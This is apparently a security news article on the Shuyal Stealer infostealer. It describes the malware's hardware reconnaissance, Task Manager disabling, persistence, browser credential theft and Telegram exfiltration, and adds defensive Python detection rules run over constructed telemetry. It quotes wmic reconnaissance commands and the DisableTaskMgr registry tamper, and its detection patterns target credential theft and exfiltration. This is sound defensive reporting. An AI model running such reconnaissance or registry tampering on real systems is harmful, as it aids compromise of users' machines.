Infection chain flow | Image: Lat61 Threat Intelligence Team
Security researchers at Point Wild have uncovered a new information-stealing malware dubbed Shuyal Stealer, which pushes the boundaries of traditional credential-harvesting trojans. Unlike most infostealers that focus on a handful of browsers such as Chrome or Edge, Shuyal widens its scope dramatically—targeting 19 different browsers while performing deep reconnaissance of infected systems.
According to the analysis, “Shuyal Stealer is a recently uncovered Infostealer that pushes the boundaries of traditional browser-targeted malware. Unlike most variants that zero in on popular platforms like Chrome and Edge, Shuyal dramatically widens its scope by targeting 19 different browsers, making it far more versatile and dangerous in its data-harvesting capabilities.”
The malware doesn’t just exfiltrate saved credentials. It also collects detailed hardware and configuration data, making it capable of building a unique fingerprint for every compromised system.
As the report details, “Shuyal Stealer conducts deep system profiling using Windows Management Instrumentation (WMI) commands, enabling it to extract granular hardware and configuration data.”
These reconnaissance commands, for example wmic diskdrive get model,serialnumber and wmic path Win32_Keyboard get Description,DeviceID, let Shuyal enumerate hardware such as disk models and serial numbers, keyboards and display configuration. The resulting fingerprint lets an attacker tie the stolen credentials to one specific machine and tailor follow-on activity, which matters most in targeted attacks. For defenders, wmic.exe issuing hardware-class queries from a non-shell parent is a useful signal; Microsoft has deprecated wmic.exe, so legitimate use keeps shrinking.
One of Shuyal’s more conspicuous features is that it neutralizes Windows Task Manager. Immediately on execution the malware enumerates running processes, finds taskmgr.exe and terminates it. That hides it from a casual user but does nothing against EDR or other process telemetry.
“As soon as it executes, the malware scans active processes to identify taskmgr.exe and shut down suspicious activity. Once located, Shuyal forcefully terminates it using the TerminateProcess method.”
Shuyal then goes further and disables Task Manager outright by setting the DisableTaskMgr registry value to 1 (Windows honours it under the Software\Microsoft\Windows\CurrentVersion\Policies\System key in either HKCU or HKLM). This is defense evasion rather than persistence: it stops the user from reopening Task Manager, and because the value lives in the registry it survives reboots until it is reset to 0 or deleted. A Task Manager that refuses to open with a “disabled by your administrator” message is itself a symptom worth investigating.
Shuyal Stealer ensures long-term access by copying itself into the Windows Startup folder using the CopyFileA API, guaranteeing that it launches automatically on reboot.
The analysis highlights, “To ensure it launches automatically with every reboot, the malware uses the CopyFileA API to silently replicate itself into the Windows Startup folder. This guarantees execution upon system restart, allowing Shuyal to remain active without raising alarms.”
Combined with the registry change, this Startup-folder persistence complicates manual cleanup: removing the binary without also restoring DisableTaskMgr, or the reverse, leaves the victim either re-infected at the next logon or still locked out of Task Manager. Victims relying on manual remediation rather than an endpoint security product are the most exposed.
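As an added example (not code from the Point Wild report or from the malware), the following Python sketches how the three behaviours above, WMI hardware reconnaissance, the DisableTaskMgr registry write and the self-copy into the Startup folder, can be caught from endpoint telemetry. The event records are constructed for the demo and use Sysmon’s field names for process-create (EventID 1), file-create (11) and registry value-set (13) events; the WMI class list and the shell-parent exclusion are assumptions a detection team would tune.

```python
"""Triage rules for the Shuyal behaviours described above, run over constructed
Sysmon-style events. Added example; the records are invented for this demo and
the field names follow Sysmon's EventID 1 / 11 / 13 schema."""
import re

# Constructed sample telemetry, not real logs.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Users\u\Downloads\setup.exe",
     "CommandLine": r"C:\Users\u\Downloads\setup.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic diskdrive get model,serialnumber",
     "ParentImage": r"C:\Users\u\Downloads\setup.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic path Win32_Keyboard get Description,DeviceID",
     "ParentImage": r"C:\Users\u\Downloads\setup.exe"},
    {"EventID": 13, "Image": r"C:\Users\u\Downloads\setup.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 11, "Image": r"C:\Users\u\Downloads\setup.exe",
     "TargetFilename": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\setup.exe"},
    # Benign noise: an administrator running wmic from an interactive shell.
    {"EventID": 1, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic os get caption",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

# WMI classes that only make sense as hardware fingerprinting (assumed list).
RECON_CLASSES = re.compile(
    r"\b(diskdrive|win32_keyboard|baseboard|bios|videocontroller|win32_desktopmonitor)\b", re.I)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
TASKMGR_VALUE = re.compile(r"\\Policies\\System\\DisableTaskMgr$", re.I)
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe")

def triage(events):
    """Return (rule, responsible_image, detail) findings for the given events."""
    findings = []
    for ev in events:
        eid = ev["EventID"]
        if (eid == 1 and ev["Image"].lower().endswith("wmic.exe")
                and RECON_CLASSES.search(ev["CommandLine"])):
            # Hardware recon spawned by a non-shell parent is the suspicious shape;
            # an interactive shell parent is treated as admin activity here.
            if not ev.get("ParentImage", "").lower().endswith(SHELLS):
                findings.append(("wmi_hardware_recon", ev["ParentImage"], ev["CommandLine"]))
        elif (eid == 13 and TASKMGR_VALUE.search(ev["TargetObject"])
                and ev["Details"].endswith("(0x00000001)")):
            findings.append(("taskmgr_disabled", ev["Image"], ev["TargetObject"]))
        elif eid == 11 and STARTUP_DIR.search(ev["TargetFilename"]):
            # Self-copy: the writing process's own file name lands in Startup.
            own_name = ev["Image"].rsplit("\\", 1)[-1].lower()
            if ev["TargetFilename"].lower().endswith(own_name):
                findings.append(("startup_self_copy", ev["Image"], ev["TargetFilename"]))
    return findings

def correlate(findings):
    """Group findings by image; two or more distinct rules on one image is high confidence."""
    by_image = {}
    for rule, image, _detail in findings:
        by_image.setdefault(image, set()).add(rule)
    return {img: sorted(rules) for img, rules in by_image.items() if len(rules) >= 2}

if __name__ == "__main__":
    found = triage(SAMPLE_EVENTS)
    for f in found:
        print(f)
    print(correlate(found))
```

Any single rule fires on legitimate activity (an administrator running wmic, an installer dropping a Startup entry); the correlate step requires two or more rules against the same image, which is what makes the Shuyal pattern stand out from the noise.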
Shuyal’s credential theft engine is engineered for breadth. It searches for the “Login Data” SQLite database across 19 different browsers, including Chrome, Edge, Brave, Opera, Yandex, Tor, Vivaldi, Waterfox, and even less common platforms such as Coc Coc and Maxthon.
Point Wild notes, “By extracting login credentials from such a diverse set of browsers, Shuyal significantly increases its chances of compromising user accounts across different platforms and regions.”
The malware then runs a SQL query against each database (the report’s query text is not reproduced here) that pulls the URL, username and encrypted password columns, giving the attacker a login triple for every saved credential. The password column is not plaintext: on Windows, Chromium-based browsers protect it with an AES-GCM key that is itself DPAPI-protected and stored in the profile’s Local State file (older entries are raw DPAPI blobs), so the stealer must also carry off that key or decrypt on the host in the victim’s user context before the credentials are usable.
But Shuyal’s espionage doesn’t stop there—it also retrieves clipboard content, captures screenshots, and steals Discord authentication tokens. Using Windows APIs such as OpenClipboard, BitBlt, and GdipSaveImageToFile, the malware saves clipboard data to clipboard.txt and screenshots to ss.png before compressing them for exfiltration.
“The program captures a screenshot by utilizing the GdiplusStartup, BitBlt, and GdipSaveImageToFile APIs, and stores the image as ‘ss.png’. It also retrieves authentication tokens from Discord, Discord Canary, and Discord PTB installations.”
Rather than relying on traditional C2 servers, Shuyal leverages Telegram’s Bot API for exfiltration—an increasingly common tactic among modern infostealers for stealth and reliability.
The researchers explain, “In Shuyal stealer’s operation, once it collects sensitive data—credentials, system info, screenshots, and clipboard contents—it compresses the stolen files (often into a ZIP archive) and exfiltrates them using a Telegram bot.”
The Telegram bot token and chat ID are hardcoded into the malware. Using the Bot API’s file-upload method over HTTPS to api.telegram.org (the exact command is not reproduced here), the malware posts a compressed archive (runtime.zip) to the attacker’s chat, giving near-instant delivery over a channel that looks like ordinary Telegram traffic. Hardcoding cuts both ways: the token can be recovered from any captured sample, which identifies the bot, yields network indicators and allows the bot to be reported for takedown.
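As an added example (not from the report or the malware), this Python pass over a constructed web-proxy log shows what Telegram Bot API exfiltration looks like from the network side and how the hardcoded token falls out of it. The log format, the fabricated token and the token regex (Telegram tokens are a numeric bot id, a colon and a 35-character secret; the pattern allows some slack) are assumptions.

```python
"""Spot Telegram Bot API exfiltration in web-proxy / TLS-inspection logs.
Added example over constructed log lines; the token is fabricated and the
regex approximates Telegram's token format (assumption)."""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed proxy log: "<ts> <src> <method> <url> <bytes_out>". Not real traffic.
SAMPLE_PROXY_LOG = """\
2025-10-20T09:14:02Z 10.1.2.34 GET https://api.telegram.org/bot7123456789:AAH9xqY2vW7mJ3kLq8RtZ0sPbN4dE6fG1hI/getMe 0
2025-10-20T09:14:03Z 10.1.2.34 POST https://api.telegram.org/bot7123456789:AAH9xqY2vW7mJ3kLq8RtZ0sPbN4dE6fG1hI/sendDocument?chat_id=-1001234567890 184320
2025-10-20T09:15:11Z 10.1.2.57 GET https://web.telegram.org/a/ 0
2025-10-20T09:16:40Z 10.1.2.34 POST https://api.telegram.org/bot7123456789:AAH9xqY2vW7mJ3kLq8RtZ0sPbN4dE6fG1hI/sendMessage 512
"""

# "<numeric bot id>:<35 url-safe chars>" is the commonly observed token shape;
# the quantifiers leave slack on purpose (assumption, tune to your data).
TOKEN_RE = re.compile(r"/bot(\d{6,12}:[A-Za-z0-9_-]{30,45})/([A-Za-z]+)")
UPLOAD_METHODS = {"sendDocument", "sendPhoto", "sendVideo", "sendAudio", "sendAnimation"}

def parse_line(line):
    """Split one constructed proxy line into its fields."""
    ts, src, method, url, size = line.split(maxsplit=4)
    return {"ts": ts, "src": src, "method": method, "url": url, "bytes": int(size)}

def find_bot_exfil(log_text, min_bytes=64 * 1024):
    """Return one record per Bot API call seen.

    Every api.telegram.org request carrying a bot token is recorded (verdict
    'bot_api'); a file-carrying method with at least min_bytes uploaded is
    marked 'exfil'. Human use of web.telegram.org is ignored."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        parts = urlsplit(rec["url"])
        if parts.hostname != "api.telegram.org":
            continue
        m = TOKEN_RE.search(parts.path)
        if not m:
            continue
        token, api_method = m.group(1), m.group(2)
        # chat_id may ride in the query string or in the multipart body; only the
        # former is visible in a URL log, so it is optional here.
        chat_id = parse_qs(parts.query).get("chat_id", [None])[0]
        is_upload = api_method in UPLOAD_METHODS and rec["bytes"] >= min_bytes
        hits.append({"ts": rec["ts"], "src": rec["src"], "bot_id": token.split(":")[0],
                     "token": token, "api_method": api_method, "chat_id": chat_id,
                     "verdict": "exfil" if is_upload else "bot_api"})
    return hits

def tokens_to_block(hits):
    """Distinct tokens seen, for IOC lists and for reporting the bot to Telegram."""
    return sorted({h["token"] for h in hits})

if __name__ == "__main__":
    for h in find_bot_exfil(SAMPLE_PROXY_LOG):
        print(h["verdict"], h["ts"], h["src"], h["api_method"], h["bot_id"], h["chat_id"])
    print(tokens_to_block(find_bot_exfil(SAMPLE_PROXY_LOG)))
```

Only a TLS-inspecting proxy sees the path and therefore the token; with DNS or SNI alone you get api.telegram.org and a byte count, which is still enough to flag a host that has never talked to Telegram before pushing a 180 KB upload there right after a burst of wmic activity.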
After exfiltration completes, Shuyal writes and runs a batch file (util.bat) that deletes the malware and its related files, reducing the on-disk evidence. Artifacts elsewhere on the host, such as Prefetch and Amcache execution records, the DisableTaskMgr registry value and the network traffic to api.telegram.org, typically outlive the self-deletion and are where responders should look.
“Finally, SHUYAL erases its footprint by generating and executing a batch file designed to remove the malware and its related components. This self-deletion tactic minimizes forensic evidence, making post-infection analysis and attribution significantly more difficult.”